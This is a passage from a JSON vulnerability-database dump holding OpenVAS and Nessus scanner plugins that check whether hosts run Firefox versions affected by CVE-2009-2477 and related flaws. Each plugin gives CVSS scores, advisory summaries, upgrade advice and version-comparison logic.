value:\"Successful attacks will let attackers to can cause Denial of Service to the\n legitimate user.\");\n script_tag(name:\"affected\", value:\"Firefox version 3.5.1 and prior on Linux\");\n script_tag(name:\"insight\", value:\"- A NULL pointer dereference error exists due an unspecified vectors, related\n to a 
'flash bug.' which can cause application crash.\n\n - Stack-based buffer overflow error is caused by sending an overly long string\n argument to the 'document.write' method.\");\n script_tag(name:\"solution\", value:\"Upgrade to Firefox version 3.6.3 or later.\");\n script_tag(name:\"summary\", value:\"The host is installed with Mozilla Firefox browser and is prone\n to Buffer Overflow vulnerability.\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"http://www.mozilla.com/en-US/firefox/upgrade.html\");\n exit(0);\n}\n\n\ninclude(\"version_func.inc\");\n\nffVer = get_kb_item(\"Firefox/Linux/Ver\");\nif(!ffVer){\n exit(0);\n}\n\nif(version_is_less_equal(version:ffVer, test_version:\"3.5.1\")){\n report = report_fixed_ver(installed_version:ffVer, vulnerable_range:\"Less than or equal to 3.5.1\");\n security_message(port: 0, data: report);\n}\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2017-07-02T21:14:06", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-2477"], "description": "The host is installed with Mozilla Firefox browser and is prone\n to Remote Code Execution vulnerability.", "modified": "2016-12-28T00:00:00", "published": "2009-07-17T00:00:00", "id": "OPENVAS:800843", "href": "http://plugins.openvas.org/nasl.php?oid=800843", "type": "openvas", "title": "Mozilla Firefox JavaScript Compiler Code Execution Vulnerability (Windows)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_firefox_js_compiler_code_exec_vuln_win.nasl 4865 2016-12-28 16:16:43Z teissa $\n#\n# Mozilla Firefox JavaScript Compiler Code Execution Vulnerability (Windows)\n#\n# Authors:\n# Sharath S <sharaths@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# Upgrade to detect non vulnerable version\n# - By 
sharaths <sharaths@secpod.com> On 2009-07-17\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_impact = \"Successful exploitation will let attackers to execute arbitrary code which\n results in memory corruption.\n Impact Level: Application\";\ntag_affected = \"Firefox version 3.5 and prior on Windows\";\ntag_insight = \"The flaw is due to an error when processing JavaScript code handling\n 'font' HTML tags and can be exploited to cause memory corruption.\";\ntag_solution = \"Upgrade to Firefox version 3.5.1 or later\n http://www.mozilla.com/en-US/firefox/all.html\";\ntag_summary = \"The host is installed with Mozilla Firefox browser and is prone\n to Remote Code Execution vulnerability.\";\n\nif(description)\n{\n script_id(800843);\n script_version(\"$Revision: 4865 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2016-12-28 17:16:43 +0100 (Wed, 28 Dec 2016) $\");\n script_tag(name:\"creation_date\", value:\"2009-07-17 12:47:28 +0200 (Fri, 17 Jul 2009)\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_cve_id(\"CVE-2009-2477\");\n script_bugtraq_id(35707);\n script_name(\"Mozilla Firefox JavaScript Compiler Code Execution Vulnerability (Windows)\");\n 
script_xref(name : \"URL\" , value : \"http://secunia.com/advisories/35798\");\n script_xref(name : \"URL\" , value : \"http://www.milw0rm.com/exploits/9137\");\n script_xref(name : \"URL\" , value : \"http://www.vupen.com/english/advisories/2009/1868\");\n script_xref(name : \"URL\" , value : \"http://www.mozilla.org/security/announce/2009/mfsa2009-41.html\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_firefox_detect_win.nasl\");\n script_require_keys(\"Firefox/Win/Ver\");\n script_tag(name : \"impact\" , value : tag_impact);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"registry\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"version_func.inc\");\n\nffVer = get_kb_item(\"Firefox/Win/Ver\");\nif(!ffVer){\n exit(0);\n}\n\n# Grep for Firefox version < 3.5.1\nif(version_is_less(version:ffVer, test_version:\"3.5.1\")){\n security_message(0);\n}\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-04-06T11:37:44", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-2477"], "description": "The remote host is missing an update to the system\nas announced in the referenced advisory.", "modified": "2018-04-06T00:00:00", "published": "2009-07-29T00:00:00", "id": "OPENVAS:136141256231064446", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231064446", "type": "openvas", "title": "FreeBSD Ports: firefox35", "sourceData": "#\n#VID c1ef9b33-72a6-11de-82ea-0030843d3802\n# OpenVAS Vulnerability Test\n# $\n# Description: Auto generated from VID c1ef9b33-72a6-11de-82ea-0030843d3802\n#\n# Authors:\n# Thomas Reinke 
<reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The following package is affected: firefox35\";\ntag_solution = \"Update your system with the appropriate patches or\nsoftware upgrades.\n\nhttp://www.mozilla.org/security/announce/2009/mfsa2009-41.html\nhttp://www.kb.cert.org/vuls/id/443060\nhttp://www.vuxml.org/freebsd/c1ef9b33-72a6-11de-82ea-0030843d3802.html\";\ntag_summary = \"The remote host is missing an update to the system\nas announced in the referenced advisory.\";\n\n\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.64446\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_version(\"$Revision: 9350 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 09:03:33 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-07-29 19:28:37 +0200 (Wed, 29 Jul 2009)\");\n script_cve_id(\"CVE-2009-2477\");\n script_name(\"FreeBSD Ports: firefox35\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. 
http://www.securityspace.com\");\n script_family(\"FreeBSD Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/freebsdrel\", \"login/SSH/success\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-bsd.inc\");\n\ntxt = \"\";\nvuln = 0;\nbver = portver(pkg:\"firefox35\");\nif(!isnull(bver) && revcomp(a:bver, b:\"3.5.1,1\")<0) {\n txt += 'Package firefox35 version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\n\nif(vuln) {\n security_message(data:string(txt));\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-02T21:13:51", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-2477"], "description": "The remote host is missing an update to the system\nas announced in the referenced advisory.", "modified": "2016-12-21T00:00:00", "published": "2009-07-29T00:00:00", "id": "OPENVAS:64446", "href": "http://plugins.openvas.org/nasl.php?oid=64446", "type": "openvas", "title": "FreeBSD Ports: firefox35", "sourceData": "#\n#VID c1ef9b33-72a6-11de-82ea-0030843d3802\n# OpenVAS Vulnerability Test\n# $\n# Description: Auto generated from VID c1ef9b33-72a6-11de-82ea-0030843d3802\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. 
http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The following package is affected: firefox35\";\ntag_solution = \"Update your system with the appropriate patches or\nsoftware upgrades.\n\nhttp://www.mozilla.org/security/announce/2009/mfsa2009-41.html\nhttp://www.kb.cert.org/vuls/id/443060\nhttp://www.vuxml.org/freebsd/c1ef9b33-72a6-11de-82ea-0030843d3802.html\";\ntag_summary = \"The remote host is missing an update to the system\nas announced in the referenced advisory.\";\n\n\n\nif(description)\n{\n script_id(64446);\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_version(\"$Revision: 4824 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2016-12-21 09:49:38 +0100 (Wed, 21 Dec 2016) $\");\n script_tag(name:\"creation_date\", value:\"2009-07-29 19:28:37 +0200 (Wed, 29 Jul 2009)\");\n script_cve_id(\"CVE-2009-2477\");\n script_name(\"FreeBSD Ports: firefox35\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. 
http://www.securityspace.com\");\n script_family(\"FreeBSD Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/freebsdrel\", \"login/SSH/success\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-bsd.inc\");\n\ntxt = \"\";\nvuln = 0;\nbver = portver(pkg:\"firefox35\");\nif(!isnull(bver) && revcomp(a:bver, b:\"3.5.1,1\")<0) {\n txt += 'Package firefox35 version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\n\nif(vuln) {\n security_message(data:string(txt));\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2020-04-29T22:26:32", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-2477"], "description": "The host is installed with Mozilla Firefox browser and is prone\n to Remote Code Execution vulnerability.", "modified": "2020-04-27T00:00:00", "published": "2009-07-17T00:00:00", "id": "OPENVAS:1361412562310800844", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310800844", "type": "openvas", "title": "Mozilla Firefox JavaScript Compiler Code Execution Vulnerability (Linux)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Mozilla Firefox JavaScript Compiler Code Execution Vulnerability (Linux)\n#\n# Authors:\n# Sharath S <sharaths@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# Upgrade to detect non vulnerable version\n# - By sharaths <sharaths@secpod.com> On 2009-07-17\n#\n# This program is 
free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.800844\");\n script_version(\"2020-04-27T09:00:11+0000\");\n script_tag(name:\"last_modification\", value:\"2020-04-27 09:00:11 +0000 (Mon, 27 Apr 2020)\");\n script_tag(name:\"creation_date\", value:\"2009-07-17 12:47:28 +0200 (Fri, 17 Jul 2009)\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_cve_id(\"CVE-2009-2477\");\n script_bugtraq_id(35707);\n script_name(\"Mozilla Firefox JavaScript Compiler Code Execution Vulnerability (Linux)\");\n script_xref(name:\"URL\", value:\"http://secunia.com/advisories/35798\");\n script_xref(name:\"URL\", value:\"http://www.milw0rm.com/exploits/9137\");\n script_xref(name:\"URL\", value:\"http://www.vupen.com/english/advisories/2009/1868\");\n script_xref(name:\"URL\", value:\"http://www.mozilla.org/security/announce/2009/mfsa2009-41.html\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_firefox_detect_lin.nasl\");\n script_mandatory_keys(\"Firefox/Linux/Ver\");\n script_tag(name:\"impact\", value:\"Successful exploitation will let attackers to 
execute arbitrary code which\n results in memory corruption.\");\n script_tag(name:\"affected\", value:\"Firefox version 3.5 and prior on Linux\");\n script_tag(name:\"insight\", value:\"The flaw is due to an error when processing JavaScript code handling\n 'font' HTML tags and can be exploited to cause memory corruption.\");\n script_tag(name:\"solution\", value:\"Upgrade to Firefox version 3.5.1 or later.\");\n script_tag(name:\"summary\", value:\"The host is installed with Mozilla Firefox browser and is prone\n to Remote Code Execution vulnerability.\");\n script_tag(name:\"qod_type\", value:\"executable_version_unreliable\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\ninclude(\"version_func.inc\");\n\nffVer = get_kb_item(\"Firefox/Linux/Ver\");\nif(!ffVer)\n exit(0);\n\nif(version_is_less(version:ffVer, test_version:\"3.5.1\")){\n report = report_fixed_ver(installed_version:ffVer, fixed_version:\"3.5.1\");\n security_message(port: 0, data: report);\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "nessus": [{"lastseen": "2021-01-12T10:07:31", "description": "Update to new upstream Firefox version 3.5.1, fixing multiple security\nissues detailed in the upstream advisories:\nhttp://www.mozilla.org/security/known-\nvulnerabilities/firefox35.html#firefox3.5.1 Update also includes all\npackages depending on gecko-libs rebuilt against new version of\nFirefox / XULRunner.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 27, "published": "2009-07-23T00:00:00", "title": "Fedora 11 : kazehakase-0.5.6-11.svn3771_trunk.fc11.3 / Miro-2.0.5-2.fc11 / blam-1.8.5-12.fc11 / etc (2009-7898)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-2477", "CVE-2009-2478", "CVE-2009-2479"], "modified": "2009-07-23T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:google-gadgets", "p-cpe:/a:fedoraproject:fedora:xulrunner", "p-cpe:/a:fedoraproject:fedora:firefox", "p-cpe:/a:fedoraproject:fedora:perl-Gtk2-MozEmbed", "p-cpe:/a:fedoraproject:fedora:epiphany", "p-cpe:/a:fedoraproject:fedora:chmsee", "p-cpe:/a:fedoraproject:fedora:ruby-gnome2", "p-cpe:/a:fedoraproject:fedora:evolution-rss", "p-cpe:/a:fedoraproject:fedora:java-1.6.0-openjdk", "p-cpe:/a:fedoraproject:fedora:kazehakase", "p-cpe:/a:fedoraproject:fedora:gnome-python2-extras", "p-cpe:/a:fedoraproject:fedora:epiphany-extensions", "p-cpe:/a:fedoraproject:fedora:blam", "p-cpe:/a:fedoraproject:fedora:hulahop", "p-cpe:/a:fedoraproject:fedora:gnome-web-photo", "p-cpe:/a:fedoraproject:fedora:galeon", "p-cpe:/a:fedoraproject:fedora:eclipse", "cpe:/o:fedoraproject:fedora:11", "p-cpe:/a:fedoraproject:fedora:Miro", "p-cpe:/a:fedoraproject:fedora:mozvoikko", "p-cpe:/a:fedoraproject:fedora:yelp"], "id": "FEDORA_2009-7898.NASL", "href": "https://www.tenable.com/plugins/nessus/40347", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2009-7898.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(40347);\n script_version(\"1.27\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2009-2477\", \"CVE-2009-2478\", \"CVE-2009-2479\");\n script_bugtraq_id(35660, 35707);\n 
script_xref(name:\"FEDORA\", value:\"2009-7898\");\n\n script_name(english:\"Fedora 11 : kazehakase-0.5.6-11.svn3771_trunk.fc11.3 / Miro-2.0.5-2.fc11 / blam-1.8.5-12.fc11 / etc (2009-7898)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Update to new upstream Firefox version 3.5.1, fixing multiple security\nissues detailed in the upstream advisories:\nhttp://www.mozilla.org/security/known-\nvulnerabilities/firefox35.html#firefox3.5.1 Update also includes all\npackages depending on gecko-libs rebuilt against new version of\nFirefox / XULRunner.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n # http://www.mozilla.org/security/known-\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.mozilla.org/en-US/security/known-\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=511228\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2009-July/026829.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?c4dd5e68\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2009-July/026830.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?c39626ea\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2009-July/026831.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?516373f1\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2009-July/026832.html\n script_set_attribute(\n 
attribute:\"see_also\",\n value:\"http://www.nessus.org/u?35f8f173\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2009-July/026833.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?1c9cf6fc\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2009-July/026834.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?5868543c\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2009-July/026835.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?3d7aa3f7\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2009-July/026836.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?6c17131d\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2009-July/026837.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?39187779\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2009-July/026838.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?54b8571c\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2009-July/026839.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?2d134e44\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2009-July/026840.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?c5892c8e\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2009-July/026841.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?4125ee3f\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2009-July/026842.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?7dbcd608\"\n );\n # 
https://lists.fedoraproject.org/pipermail/package-announce/2009-July/026843.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?eee125d3\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2009-July/026844.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?099355bd\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2009-July/026845.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?aa7e1869\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2009-July/026846.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?188401d2\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2009-July/026847.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?7f89eae2\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2009-July/026848.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?f5a3b49c\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Firefox 3.5 escape() Return Value Memory Corruption');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n 
script_cwe_id(94, 119, 189);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:Miro\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:blam\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:chmsee\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:eclipse\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:epiphany\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:epiphany-extensions\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:evolution-rss\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:firefox\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:galeon\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:gnome-python2-extras\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:gnome-web-photo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:google-gadgets\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:hulahop\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:java-1.6.0-openjdk\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:kazehakase\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:mozvoikko\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:perl-Gtk2-MozEmbed\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:ruby-gnome2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:xulrunner\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:fedoraproject:fedora:yelp\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:11\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2009/07/15\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/07/22\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/07/23\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! 
ereg(pattern:\"^11([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 11.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC11\", reference:\"Miro-2.0.5-2.fc11\")) flag++;\nif (rpm_check(release:\"FC11\", reference:\"blam-1.8.5-12.fc11\")) flag++;\nif (rpm_check(release:\"FC11\", reference:\"chmsee-1.0.1-9.fc11\")) flag++;\nif (rpm_check(release:\"FC11\", reference:\"eclipse-3.4.2-13.fc11\")) flag++;\nif (rpm_check(release:\"FC11\", reference:\"epiphany-2.26.3-2.fc11\")) flag++;\nif (rpm_check(release:\"FC11\", reference:\"epiphany-extensions-2.26.1-4.fc11\")) flag++;\nif (rpm_check(release:\"FC11\", reference:\"evolution-rss-0.1.2-11.fc11\")) flag++;\nif (rpm_check(release:\"FC11\", reference:\"firefox-3.5.1-1.fc11\")) flag++;\nif (rpm_check(release:\"FC11\", reference:\"galeon-2.0.7-12.fc11\")) flag++;\nif (rpm_check(release:\"FC11\", reference:\"gnome-python2-extras-2.25.3-5.fc11\")) flag++;\nif (rpm_check(release:\"FC11\", reference:\"gnome-web-photo-0.7-4.fc11\")) flag++;\nif (rpm_check(release:\"FC11\", reference:\"google-gadgets-0.11.0-2.fc11\")) flag++;\nif (rpm_check(release:\"FC11\", reference:\"hulahop-0.4.9-6.fc11\")) flag++;\nif (rpm_check(release:\"FC11\", reference:\"java-1.6.0-openjdk-1.6.0.0-25.b16.fc11\")) flag++;\nif (rpm_check(release:\"FC11\", reference:\"kazehakase-0.5.6-11.svn3771_trunk.fc11.3\")) flag++;\nif (rpm_check(release:\"FC11\", 